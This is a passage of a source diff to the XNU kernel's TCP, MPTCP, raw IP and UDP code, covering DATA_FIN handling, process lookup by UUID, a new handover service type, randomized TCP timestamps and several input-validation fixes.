+ if (m->m_pkthdr.mp_dsn + m->m_pkthdr.mp_rlen < dsn + dlen - dfin) { + m->m_pkthdr.pkt_flags &= ~PKTF_MPTCP_DFIN; + } else { + m->m_pkthdr.pkt_flags |= PKTF_MPTCP_DFIN; + } + } + + mpts->mpts_flags |= MPTSF_FULLY_ESTABLISHED; return 0; @@ -2123,7 +2216,8 @@ mptcp_subflow_soreceive(struct socket *so, struct sockaddr **psa, SBLASTMBUFCHK(&so->so_rcv, "mptcp_subflow_soreceive 1"); while (m != NULL) { - int dlen = 0, dfin = 0, error_out = 0; + int dlen = 0, error_out = 0, off = 0; + uint8_t dfin = 0; struct mbuf *start = m; uint64_t dsn; uint32_t sseq; @@ -2202,6 +2296,7 @@ fallback: if (m_iter->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) { dfin = 1; + dlen--; } break; @@ -2232,13 +2327,14 @@ fallback: if (m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) { dfin = 1; + dlen--; } } /* * Check if the full mapping is now present */ - if ((int)so->so_rcv.sb_cc < dlen - dfin) { + if ((int)so->so_rcv.sb_cc < dlen) { if (*mp0 == NULL) { error = EWOULDBLOCK; } @@ -2246,8 +2342,9 @@ fallback: } /* Now, get the full mapping */ + off = 0; while (dlen > 0) { - if (mptcp_adj_rmap(so, m, orig_dlen - dlen, dsn, sseq, orig_dlen)) { + if (mptcp_adj_rmap(so, m, off, dsn, sseq, orig_dlen, dfin)) { error_out = 1; error = EIO; dlen = 0; @@ -2256,6 +2353,7 @@ fallback: } dlen -= m->m_len; + off += m->m_len; sbfree(&so->so_rcv, m); if (mp != NULL) { @@ -2265,11 +2363,7 @@ fallback: *mp = NULL; } - if (dlen - dfin == 0) { - dlen = 0; - } - - VERIFY(dlen <= 0 || m); + VERIFY(dlen == 0 || m); } VERIFY(dlen == 0); @@ -2745,6 +2839,23 @@ mptcp_subflow_disconnect(struct mptses *mpte, struct mptsub *mpts) send_dfin = 1; } + if (mp_so->so_flags & SOF_DEFUNCT) { + errno_t ret; + + ret = sosetdefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, TRUE); + if (ret == 0) { + ret = sodefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL); + + if (ret != 0) { + os_log_error(mptcp_log_handle, "%s - %lx: sodefunct failed with %d\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret); + } + } else { + os_log_error(mptcp_log_handle, "%s - %lx: sosetdefunct failed with %d\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret); + } + } + if (!(so->so_state & (SS_ISDISCONNECTING | SS_ISDISCONNECTED)) && (so->so_state & SS_ISCONNECTED)) { mptcplog((LOG_DEBUG, "%s: cid %d fin %d\n", @@ -2755,26 +2866,9 @@ mptcp_subflow_disconnect(struct mptses *mpte, struct mptsub *mpts) mptcp_send_dfin(so); } - if (mp_so->so_flags & SOF_DEFUNCT) { - errno_t ret; - - ret = sosetdefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, TRUE); - if (ret == 0) { - ret = sodefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL); - - if (ret != 0) { - os_log_error(mptcp_log_handle, "%s - %lx: sodefunct failed with %d\n", - __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret); - } - } else { - os_log_error(mptcp_log_handle, "%s - %lx: sosetdefunct failed with %d\n", - __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret); - } - } else { - (void) soshutdownlock(so, SHUT_RD); - (void) soshutdownlock(so, SHUT_WR); - (void) sodisconnectlocked(so); - } + (void) soshutdownlock(so, SHUT_RD); + (void) soshutdownlock(so, SHUT_WR); + (void) sodisconnectlocked(so); } /* @@ -3350,6 +3444,9 @@ done_sending: */ error = 0; } else { + /* We need to revert our change to mpts_rel_seq */ + mpts->mpts_rel_seq -= tot_sent; + os_log_error(mptcp_log_handle, "%s - %lx: %u error %d len %d subflags %#x sostate %#x soerror %u hiwat %u lowat %u\n", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), mpts->mpts_connid, error, tot_sent, so->so_flags, so->so_state, so->so_error, so->so_snd.sb_hiwat, so->so_snd.sb_lowat); } @@ -3399,9 +3496,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m) /* m is already fully covered by the next mbuf in the queue */ if (n->m_pkthdr.mp_dsn == m->m_pkthdr.mp_dsn && n->m_pkthdr.mp_rlen >= m->m_pkthdr.mp_rlen) { - mptcplog((LOG_DEBUG, "%s fully covered with len %u\n", - __func__, n->m_pkthdr.mp_rlen), - MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE); + os_log(mptcp_log_handle, "%s - %lx: dsn %u dlen %u rseq %u fully covered with len %u\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), + (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen, + m->m_pkthdr.mp_rseq, n->m_pkthdr.mp_rlen); goto dont_queue; } @@ -3409,10 +3507,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m) if (m->m_pkthdr.mp_dsn + m->m_pkthdr.mp_rlen >= n->m_pkthdr.mp_dsn + n->m_pkthdr.mp_rlen) { struct mbuf *tmp = n->m_nextpkt; - mptcplog((LOG_DEBUG, "%s m is covering that guy dsn %u len %u dsn %u len %u\n", - __func__, (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen, - (uint32_t)n->m_pkthdr.mp_dsn, n->m_pkthdr.mp_rlen), - MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE); + os_log(mptcp_log_handle, "%s - %lx: m (dsn %u len %u) is covering existing mbuf (dsn %u len %u)\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), + (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen, + (uint32_t)n->m_pkthdr.mp_dsn, n->m_pkthdr.mp_rlen); m->m_nextpkt = NULL; if (prev == NULL) { @@ -3429,9 +3527,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m) if (prev) { /* m is already fully covered by the previous mbuf in the queue */ if (prev->m_pkthdr.mp_dsn + prev->m_pkthdr.mp_rlen >= m->m_pkthdr.mp_dsn + m->m_pkthdr.len) { - mptcplog((LOG_DEBUG, "%s prev covers us from %u with len %u\n", - __func__, (uint32_t)prev->m_pkthdr.mp_dsn, prev->m_pkthdr.mp_rlen), - MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE); + os_log(mptcp_log_handle, "%s - %lx: prev (dsn %u len %u) covers us (dsn %u len %u)\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), + (uint32_t)prev->m_pkthdr.mp_dsn, prev->m_pkthdr.mp_rlen, + (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen); goto dont_queue; } } @@ -3547,6 +3646,7 @@ mptcp_reinject_mbufs(struct socket *so) m = sb->sb_mb; while (m) { struct mbuf *n = m->m_next, *orig = m; + bool set_reinject_flag = false; mptcplog((LOG_DEBUG, "%s working on suna %u relseq %u iss %u len %u pktflags %#x\n", __func__, tp->snd_una, m->m_pkthdr.mp_rseq, mpts->mpts_iss, @@ -3587,6 +3687,7 @@ mptcp_reinject_mbufs(struct socket *so) */ mptcp_add_reinjectq(mpte, m); + set_reinject_flag = true; orig->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ; next: @@ -3598,7 +3699,9 @@ next: break; } - n->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ; + if (set_reinject_flag) { + n->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ; + } n = n->m_next; } @@ -3969,11 +4072,9 @@ mptcp_handle_ipv6_connection(struct mptses *mpte, const struct mptsub *mpts) ifp = sotoinpcb(so)->inp_last_outifp; if (ifnet_get_nat64prefix(ifp, nat64prefixes) == ENOENT) { - mptcp_ask_for_nat64(ifp); return; } - for (j = 0; j < NAT64_MAX_NUM_PREFIXES; j++) { int success; @@ -3983,11 +4084,11 @@ mptcp_handle_ipv6_connection(struct mptses *mpte, const struct mptsub *mpts) success = mptcp_desynthesize_ipv6_addr(&mpte->__mpte_dst_v6.sin6_addr, &nat64prefixes[j], - &mpte->mpte_dst_v4_nat64.sin_addr); + &mpte->mpte_sub_dst_v4.sin_addr); if (success) { - mpte->mpte_dst_v4_nat64.sin_len = sizeof(mpte->mpte_dst_v4_nat64); - mpte->mpte_dst_v4_nat64.sin_family = AF_INET; - mpte->mpte_dst_v4_nat64.sin_port = mpte->__mpte_dst_v6.sin6_port; + mpte->mpte_sub_dst_v4.sin_len = sizeof(mpte->mpte_sub_dst_v4); + mpte->mpte_sub_dst_v4.sin_family = AF_INET; + mpte->mpte_sub_dst_v4.sin_port = mpte->__mpte_dst_v6.sin6_port; break; } } @@ -4151,7 +4252,7 @@ mptcp_subflow_connected_ev(struct mptses *mpte, struct mptsub *mpts, mptcp_notify_mpfail(so); } else { if (IFNET_IS_CELLULAR(inp->inp_last_outifp) && - mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) { + mptcp_subflows_need_backup_flag(mpte)) { tp->t_mpflags |= (TMPF_BACKUP_PATH | TMPF_SND_MPPRIO); } else { mpts->mpts_flags |= MPTSF_PREFERRED; @@ -4186,7 +4287,7 @@ mptcp_subflow_connected_ev(struct mptses *mpte, struct mptsub *mpts, */ if (IFNET_IS_CELLULAR(inp->inp_last_outifp) && !(tp->t_mpflags & TMPF_BACKUP_PATH) && - mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) { + mptcp_subflows_need_backup_flag(mpte)) { tp->t_mpflags |= (TMPF_BACKUP_PATH | TMPF_SND_MPPRIO); mpts->mpts_flags &= ~MPTSF_PREFERRED; } else { @@ -6276,6 +6377,7 @@ mptcp_wifi_status_changed(void) /* Only handover- and urgency-mode are purely driven by Symptom's Wi-Fi status */ if (mpte->mpte_svctype != MPTCP_SVCTYPE_HANDOVER && + mpte->mpte_svctype != MPTCP_SVCTYPE_PURE_HANDOVER && mpte->mpte_svctype != MPTCP_SVCTYPE_TARGET_BASED) { goto next; } @@ -6290,12 +6392,68 @@ next: lck_mtx_unlock(&mtcbinfo.mppi_lock); } +struct mptcp_uuid_search_info { + uuid_t target_uuid; + proc_t found_proc; + boolean_t is_proc_found; +}; + +static int +mptcp_find_proc_filter(proc_t p, void *arg) +{ + struct mptcp_uuid_search_info *info = (struct mptcp_uuid_search_info *)arg; + int found; + + if (info->is_proc_found) { + return 0; + } + + /* + * uuid_compare returns 0 if the uuids are matching, but the proc-filter + * expects != 0 for a matching filter. + */ + found = uuid_compare(p->p_uuid, info->target_uuid) == 0; + if (found) { + info->is_proc_found = true; + } + + return found; +} + +static int +mptcp_find_proc_callout(proc_t p, void * arg) +{ + struct mptcp_uuid_search_info *info = (struct mptcp_uuid_search_info *)arg; + + if (uuid_compare(p->p_uuid, info->target_uuid) == 0) { + info->found_proc = p; + return PROC_CLAIMED_DONE; + } + + return PROC_RETURNED; +} + +static proc_t +mptcp_find_proc(const uuid_t uuid) +{ + struct mptcp_uuid_search_info info; + + uuid_copy(info.target_uuid, uuid); + info.found_proc = PROC_NULL; + info.is_proc_found = false; + + proc_iterate(PROC_ALLPROCLIST, mptcp_find_proc_callout, &info, + mptcp_find_proc_filter, &info); + + return info.found_proc; +} + void mptcp_ask_symptoms(struct mptses *mpte) { struct mptcp_symptoms_ask_uuid ask; struct socket *mp_so; - struct proc *p; + struct proc *p = PROC_NULL; int pid, prio, err; if (mptcp_kern_skt_unit == 0) { @@ -6307,26 +6465,50 @@ mptcp_ask_symptoms(struct mptses *mpte) mp_so = mptetoso(mpte); if (mp_so->so_flags & SOF_DELEGATED) { - pid = mp_so->e_pid; - } else { - pid = mp_so->last_pid; - } + if (mpte->mpte_epid != 0) { + p = proc_find(mpte->mpte_epid); + if (p != PROC_NULL) { + /* We found a pid, check its UUID */ + if (uuid_compare(mp_so->e_uuid, p->p_uuid)) { + /* It's not the same - we need to look for the real proc */ + proc_rele(p); + p = PROC_NULL; + } + } + } - p = proc_find(pid); - if (p == PROC_NULL) { - os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for pid %u\n", - __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), pid); - return; - } + if (p == PROC_NULL) { + p = mptcp_find_proc(mp_so->e_uuid); + if (p == PROC_NULL) { + uuid_string_t uuid_string; + uuid_unparse(mp_so->e_uuid, uuid_string); - ask.cmd = MPTCP_SYMPTOMS_ASK_UUID; + os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for uuid %s\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), uuid_string); - if (mp_so->so_flags & SOF_DELEGATED) { + return; + } + mpte->mpte_epid = proc_pid(p); + } + + pid = mpte->mpte_epid; uuid_copy(ask.uuid, mp_so->e_uuid); } else { + pid = mp_so->last_pid; + + p = proc_find(pid); + if (p == PROC_NULL) { + os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for pid %u\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), pid); + return; + } + uuid_copy(ask.uuid, mp_so->last_uuid); } + + ask.cmd = MPTCP_SYMPTOMS_ASK_UUID; + prio = proc_get_effective_task_policy(proc_task(p), TASK_POLICY_ROLE); if (prio == TASK_BACKGROUND_APPLICATION || prio == TASK_NONUI_APPLICATION || diff --git a/bsd/netinet/mptcp_usrreq.c b/bsd/netinet/mptcp_usrreq.c index ff16b486f..533b1ac30 100644 --- a/bsd/netinet/mptcp_usrreq.c +++ b/bsd/netinet/mptcp_usrreq.c @@ -109,6 +109,10 @@ int mptcp_developer_mode = 0; SYSCTL_INT(_net_inet_mptcp, OID_AUTO, allow_aggregate, CTLFLAG_RW | CTLFLAG_LOCKED, &mptcp_developer_mode, 0, "Allow the Multipath aggregation mode"); +int mptcp_no_first_party = 0; +SYSCTL_INT(_net_inet_mptcp, OID_AUTO, no_first_party, CTLFLAG_RW | CTLFLAG_LOCKED, + &mptcp_no_first_party, 0, "Do not do first-party app exemptions"); + static unsigned long mptcp_expected_progress_headstart = 5000; SYSCTL_ULONG(_net_inet_mptcp, OID_AUTO, expected_progress_headstart, CTLFLAG_RW | CTLFLAG_LOCKED, &mptcp_expected_progress_headstart, "Headstart to give MPTCP before meeting the progress deadline"); @@ -222,6 +226,10 @@ mptcp_entitlement_check(struct socket *mp_so, uint8_t svctype) { struct mptses *mpte = mpsotompte(mp_so); + if (mptcp_no_first_party) { + return 0; + } + /* First, check for mptcp_extended without delegation */ if (soopt_cred_check(mp_so, PRIV_NET_RESTRICTED_MULTIPATH_EXTENDED, TRUE, FALSE) == 0) { /* @@ -341,6 +349,12 @@ mptcp_usr_connectx(struct socket *mp_so, struct sockaddr *src, if ((mp_so->so_state & (SS_ISCONNECTED | SS_ISCONNECTING)) == 0) { memcpy(&mpte->mpte_u_dst, dst, dst->sa_len); + + if (dst->sa_family == AF_INET) { + memcpy(&mpte->mpte_sub_dst_v4, dst, dst->sa_len); + } else { + memcpy(&mpte->mpte_sub_dst_v6, dst, dst->sa_len); + } } if (src) { @@ -887,7 +901,7 @@ mptcp_disconnect(struct mptses *mpte) struct socket *, mp_so, struct mptcb *, mp_tp); /* if we're not detached, go thru socket state checks */ - if (!(mp_so->so_flags & SOF_PCBCLEARING)) { + if (!(mp_so->so_flags & SOF_PCBCLEARING) && !(mp_so->so_flags & SOF_DEFUNCT)) { if (!(mp_so->so_state & (SS_ISCONNECTED | SS_ISCONNECTING))) { error = ENOTCONN; @@ -953,7 +967,7 @@ mptcp_finish_usrclosed(struct mptses *mpte) struct mptcb *mp_tp = mpte->mpte_mptcb; struct socket *mp_so = mptetoso(mpte); - if (mp_tp->mpt_state == MPTCPS_CLOSED) { + if (mp_tp->mpt_state == MPTCPS_CLOSED || mp_tp->mpt_state == MPTCPS_TERMINATE) { mpte = mptcp_close(mpte, mp_tp); } else if (mp_tp->mpt_state >= MPTCPS_FIN_WAIT_2) { soisdisconnected(mp_so); @@ -982,7 +996,8 @@ mptcp_usrclosed(struct mptses *mpte) mptcp_close_fsm(mp_tp, MPCE_CLOSE); /* Not everything has been acknowledged - don't close the subflows! */ - if (mp_tp->mpt_sndnxt + 1 != mp_tp->mpt_sndmax) { + if (mp_tp->mpt_state != MPTCPS_TERMINATE && + mp_tp->mpt_sndnxt + 1 != mp_tp->mpt_sndmax) { return mpte; } @@ -1648,6 +1663,7 @@ mptcp_setopt(struct mptses *mpte, struct sockopt *sopt) case PERSIST_TIMEOUT: case TCP_ADAPTIVE_READ_TIMEOUT: case TCP_ADAPTIVE_WRITE_TIMEOUT: + case TCP_FASTOPEN_FORCE_ENABLE: /* eligible; record it */ break; case TCP_NOTSENT_LOWAT: @@ -2011,6 +2027,7 @@ mptcp_getopt(struct mptses *mpte, struct sockopt *sopt) case TCP_RXT_CONNDROPTIME: case TCP_ADAPTIVE_READ_TIMEOUT: case TCP_ADAPTIVE_WRITE_TIMEOUT: + case TCP_FASTOPEN_FORCE_ENABLE: { struct mptopt *mpo = mptcp_sopt_find(mpte, sopt); @@ -2213,6 +2230,8 @@ mptcp_sopt2str(int level, int optname) return "ADAPTIVE_READ_TIMEOUT"; case TCP_ADAPTIVE_WRITE_TIMEOUT: return "ADAPTIVE_WRITE_TIMEOUT"; + case TCP_FASTOPEN_FORCE_ENABLE: + return "TCP_FASTOPEN_FORCE_ENABLE"; case MPTCP_SERVICE_TYPE: return "MPTCP_SERVICE_TYPE"; case MPTCP_ALTERNATE_PORT: diff --git a/bsd/netinet/mptcp_var.h b/bsd/netinet/mptcp_var.h index cc16b1c70..17aa71b78 100644 --- a/bsd/netinet/mptcp_var.h +++ b/bsd/netinet/mptcp_var.h @@ -93,10 +93,8 @@ struct mptses { #define __mpte_dst_v4 mpte_u_dst._mpte_dst_v4 #define __mpte_dst_v6 mpte_u_dst._mpte_dst_v6 - struct sockaddr_in mpte_dst_v4_nat64; - - struct sockaddr_in mpte_dst_unicast_v4; - struct sockaddr_in6 mpte_dst_unicast_v6; + struct sockaddr_in mpte_sub_dst_v4; + struct sockaddr_in6 mpte_sub_dst_v6; uint16_t mpte_alternate_port; /* Alternate port for subflow establishment (network-byte-order) */ @@ -205,6 +203,12 @@ mptcp_subflow_cwnd_space(struct socket *so) return MIN(cwnd, sbspace(&so->so_snd)); } +static inline bool +mptcp_subflows_need_backup_flag(struct mptses *mpte) +{ + return mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE || + mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER; +} /* * MPTCP socket options @@ -639,7 +643,6 @@ extern void mptcp_ask_symptoms(struct mptses *mpte); extern void mptcp_control_register(void); extern int mptcp_is_wifi_unusable_for_session(struct mptses *mpte); extern boolean_t symptoms_is_wifi_lossy(void); -extern void mptcp_ask_for_nat64(struct ifnet *ifp); extern void mptcp_session_necp_cb(void *, int, uint32_t, uint32_t, bool *); extern struct sockaddr *mptcp_get_session_dst(struct mptses *mpte, boolean_t has_v6, boolean_t has_v4); diff --git a/bsd/netinet/raw_ip.c b/bsd/netinet/raw_ip.c index a140e8925..2975ccff1 100644 --- a/bsd/netinet/raw_ip.c +++ b/bsd/netinet/raw_ip.c @@ -934,6 +934,9 @@ rip_attach(struct socket *so, int proto, struct proc *p) if ((so->so_state & SS_PRIV) == 0) { return EPERM; } + if (proto > UINT8_MAX) { + return EINVAL; + } error = soreserve(so, rip_sendspace, rip_recvspace); if (error) { diff --git a/bsd/netinet/tcp.h b/bsd/netinet/tcp.h index b63fc818b..3021fb0b5 100644 --- a/bsd/netinet/tcp.h +++ b/bsd/netinet/tcp.h @@ -293,7 +293,9 @@ struct tcp_notify_ack_complete { #define MPTCP_SVCTYPE_INTERACTIVE 1 #define MPTCP_SVCTYPE_AGGREGATE 2 #define MPTCP_SVCTYPE_TARGET_BASED 3 -#define MPTCP_SVCTYPE_MAX 4 +#define MPTCP_SVCTYPE_PURE_HANDOVER 4 +#define MPTCP_SVCTYPE_MAX 5 + /* * Specify minimum time in seconds before which an established * TCP connection will not be dropped when there is no response from the @@ -322,10 +324,15 @@ struct tcp_notify_ack_complete { #define TCPI_FLAG_STREAMING_ON 0x02 /* Streaming detection on */ struct tcp_conn_status { - unsigned int probe_activated : 1; - unsigned int write_probe_failed : 1; - unsigned int read_probe_failed : 1; - unsigned int conn_probe_failed : 1; + union { + struct { + unsigned int probe_activated : 1; + unsigned int write_probe_failed : 1; + unsigned int read_probe_failed : 1; + unsigned int conn_probe_failed : 1; + }; + uint32_t pad_field; + }; }; /* diff --git a/bsd/netinet/tcp_input.c b/bsd/netinet/tcp_input.c index bb33ba1ac..d91a93a61 100644 --- a/bsd/netinet/tcp_input.c +++ b/bsd/netinet/tcp_input.c @@ -2237,6 +2237,11 @@ findpcb: goto dropwithreset; } + /* Now that we found the tcpcb, we can adjust the TCP timestamp */ + if (to.to_flags & TOF_TS) { + to.to_tsecr -= tp->t_ts_offset; + } + TCP_LOG_TH_FLAGS(TCP_LOG_HDR, th, tp, false, ifp); if (tp->t_state == TCPS_CLOSED) { @@ -2889,7 +2894,8 @@ findpcb: * be TH_NEEDSYN. */ if (tp->t_state == TCPS_ESTABLISHED && - (thflags & (TH_SYN | TH_FIN | TH_RST | TH_URG | TH_ACK | TH_ECE | TH_CWR)) == TH_ACK && + !(so->so_state & SS_CANTRCVMORE) && + (thflags & TH_FLAGS) == TH_ACK && ((tp->t_flags & TF_NEEDFIN) == 0) && ((to.to_flags & TOF_TS) == 0 || TSTMP_GEQ(to.to_tsval, tp->ts_recent)) && @@ -3066,11 +3072,6 @@ findpcb: so_recv_data_stat(so, m, 0); m_adj(m, drop_hdrlen); /* delayed header drop */ - /* - * If message delivery (SOF_ENABLE_MSGS) is enabled on - * this socket, deliver the packet received as an - * in-order message with sequence number attached to it. - */ if (isipv6) { memcpy(&saved_hdr, ip6, sizeof(struct ip6_hdr)); ip6 = (struct ip6_hdr *)&saved_hdr[0]; @@ -3929,6 +3930,11 @@ close: close_it = TRUE; } + if (so->so_state & SS_CANTRCVMORE) { + TCP_LOG_DROP_PCB(TCP_LOG_HDR, th, tp, false, "SS_CANTRCVMORE"); + close_it = TRUE; + } + if (close_it) { tp = tcp_close(tp); tcpstat.tcps_rcvafterclose++; @@ -5165,6 +5171,11 @@ dodata: (m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) && (m->m_pkthdr.pkt_flags & PKTF_MPTCP)) { m_adj(m, drop_hdrlen); /* delayed header drop */ + /* + * 0-length DATA_FIN. The rlen is actually 0. We special-case the + * byte consumed by the dfin in mptcp_input and mptcp_reass_present + */ + m->m_pkthdr.mp_rlen = 0; mptcp_input(tptomptp(tp)->mpt_mpte, m); tp->t_flags |= TF_ACKNOW; } else { @@ -5457,6 +5468,7 @@ tcp_dooptions(struct tcpcb *tp, u_char *cp, int cnt, struct tcphdr *th, bcopy((char *)cp + 6, (char *)&to->to_tsecr, sizeof(to->to_tsecr)); NTOHL(to->to_tsecr); + to->to_tsecr -= tp->t_ts_offset; /* Re-enable sending Timestamps if we received them */ if (!(tp->t_flags & TF_REQ_TSTMP)) { tp->t_flags |= TF_REQ_TSTMP; diff --git a/bsd/netinet/tcp_output.c b/bsd/netinet/tcp_output.c index 84fe091cc..5eecbbbf5 100644 --- a/bsd/netinet/tcp_output.c +++ b/bsd/netinet/tcp_output.c @@ -155,6 +155,10 @@ SYSCTL_SKMEM_TCP_INT(OID_AUTO, ack_compression_rate, CTLFLAG_RW | CTLFLAG_LOCKED, int, tcp_ack_compression_rate, TCP_COMP_CHANGE_RATE, "Rate at which we force sending new ACKs (in ms)"); +SYSCTL_SKMEM_TCP_INT(OID_AUTO, randomize_timestamps, + CTLFLAG_RW | CTLFLAG_LOCKED, int, tcp_randomize_timestamps, 1, + "Randomize TCP timestamps to prevent tracking (on: 1, off: 0)"); + static int sysctl_change_ecn_setting SYSCTL_HANDLER_ARGS { @@ -1636,7 +1640,7 @@ send: /* Form timestamp option as shown in appendix A of RFC 1323. */ *lp++ = htonl(TCPOPT_TSTAMP_HDR); - *lp++ = htonl(tcp_now); + *lp++ = htonl(tcp_now + tp->t_ts_offset); *lp = htonl(tp->ts_recent); optlen += TCPOLEN_TSTAMP_APPA; } @@ -2814,9 +2818,9 @@ out: } /* * Unless this is due to interface restriction policy, - * treat EHOSTUNREACH/ENETDOWN as a soft error. + * treat EHOSTUNREACH/ENETDOWN/EADDRNOTAVAIL as a soft error. */ - if ((error == EHOSTUNREACH || error == ENETDOWN) && + if ((error == EHOSTUNREACH || error == ENETDOWN || error == EADDRNOTAVAIL) && TCPS_HAVERCVDSYN(tp->t_state) && !inp_restricted_send(inp, inp->inp_last_outifp)) { tp->t_softerror = error; diff --git a/bsd/netinet/tcp_subr.c b/bsd/netinet/tcp_subr.c index fe3a0192a..0b2a55138 100644 --- a/bsd/netinet/tcp_subr.c +++ b/bsd/netinet/tcp_subr.c @@ -1032,6 +1032,7 @@ tcp_newtcpcb(struct inpcb *inp) struct tcpcb *tp; struct socket *so = inp->inp_socket; int isipv6 = (inp->inp_vflag & INP_IPV6) != 0; + uint32_t random_32; calculate_tcp_clock(); @@ -1104,14 +1105,19 @@ tcp_newtcpcb(struct inpcb *inp) tp->t_twentry.tqe_next = NULL; tp->t_twentry.tqe_prev = NULL; + read_frandom(&random_32, sizeof(random_32)); if (__probable(tcp_do_ack_compression)) { - read_frandom(&tp->t_comp_gencnt, sizeof(tp->t_comp_gencnt)); + tp->t_comp_gencnt = random_32; if (tp->t_comp_gencnt <= TCP_ACK_COMPRESSION_DUMMY) { tp->t_comp_gencnt = TCP_ACK_COMPRESSION_DUMMY + 1; } tp->t_comp_lastinc = tcp_now; } + if (__probable(tcp_randomize_timestamps)) { + tp->t_ts_offset = random_32; + } + /* * IPv4 TTL initialization is necessary for an IPv6 socket as well, * because the socket may be bound to an IPv6 wildcard address, diff --git a/bsd/netinet/tcp_timer.c b/bsd/netinet/tcp_timer.c index 5012199aa..2070bab17 100644 --- a/bsd/netinet/tcp_timer.c +++ b/bsd/netinet/tcp_timer.c @@ -1052,7 +1052,8 @@ retransmit_packet: (so->so_flags & SOF_MP_SUBFLOW)) { struct mptses *mpte = tptomptp(tp)->mpt_mpte; - if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || + mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { mptcp_check_subflows_and_add(mpte); } } diff --git a/bsd/netinet/tcp_usrreq.c b/bsd/netinet/tcp_usrreq.c index fca0d56a6..861c9f71d 100644 --- a/bsd/netinet/tcp_usrreq.c +++ b/bsd/netinet/tcp_usrreq.c @@ -685,10 +685,18 @@ tcp6_usr_connect(struct socket *so, struct sockaddr *nam, struct proc *p) struct sockaddr_in sin; if ((inp->inp_flags & IN6P_IPV6_V6ONLY) != 0) { - return EINVAL; + error = EINVAL; + goto out; } in6_sin6_2_sin(&sin, sin6p); + /* + * Must disallow TCP ``connections'' to multicast addresses. + */ + if (IN_MULTICAST(ntohl(sin.sin_addr.s_addr))) { + error = EAFNOSUPPORT; + goto out; + } inp->inp_vflag |= INP_IPV4; inp->inp_vflag &= ~INP_IPV6; if ((error = tcp_connect(tp, (struct sockaddr *)&sin, p)) != 0) { diff --git a/bsd/netinet/tcp_var.h b/bsd/netinet/tcp_var.h index 3a93146ae..b332da095 100644 --- a/bsd/netinet/tcp_var.h +++ b/bsd/netinet/tcp_var.h @@ -69,6 +69,9 @@ #include #include #include +#if !KERNEL +#include +#endif #if defined(__LP64__) #define _TCPCB_PTR(x) u_int32_t @@ -642,6 +645,8 @@ struct tcpcb { uint32_t t_comp_lastinc; /* Last time the gen-count was changed - should change every TCP_COMP_CHANGE_RATE ms */ #define TCP_COMP_CHANGE_RATE 5 /* Intervals at which we change the gencnt. Means that worst-case we send one ACK every TCP_COMP_CHANGE_RATE ms */ + uint32_t t_ts_offset; /* Randomized timestamp offset to hide on-the-wire timestamp */ + uuid_t t_fsw_uuid; uuid_t t_flow_uuid; }; @@ -1227,7 +1232,7 @@ struct xtcpcb { u_quad_t xt_alignment_hack; }; -#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) +#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) struct xtcpcb64 { u_int32_t xt_len; @@ -1308,7 +1313,7 @@ struct xtcpcb64 { u_quad_t xt_alignment_hack; }; -#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ +#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ #ifdef PRIVATE @@ -1497,6 +1502,7 @@ extern uint32_t tcp_do_autorcvbuf; extern uint32_t tcp_autorcvbuf_max; extern int tcp_recv_bg; extern int tcp_do_ack_compression; +extern int tcp_randomize_timestamps; /* * Dummy value used for when there is no flow and we want to ensure that compression * can happen. diff --git a/bsd/netinet/udp_usrreq.c b/bsd/netinet/udp_usrreq.c index e789cb7bc..f8214f132 100644 --- a/bsd/netinet/udp_usrreq.c +++ b/bsd/netinet/udp_usrreq.c @@ -2346,12 +2346,8 @@ udp_disconnect(struct socket *so) struct inpcb *inp; inp = sotoinpcb(so); - if (inp == NULL -#if NECP - || (necp_socket_should_use_flow_divert(inp)) -#endif /* NECP */ - ) { - return inp == NULL ? EINVAL : 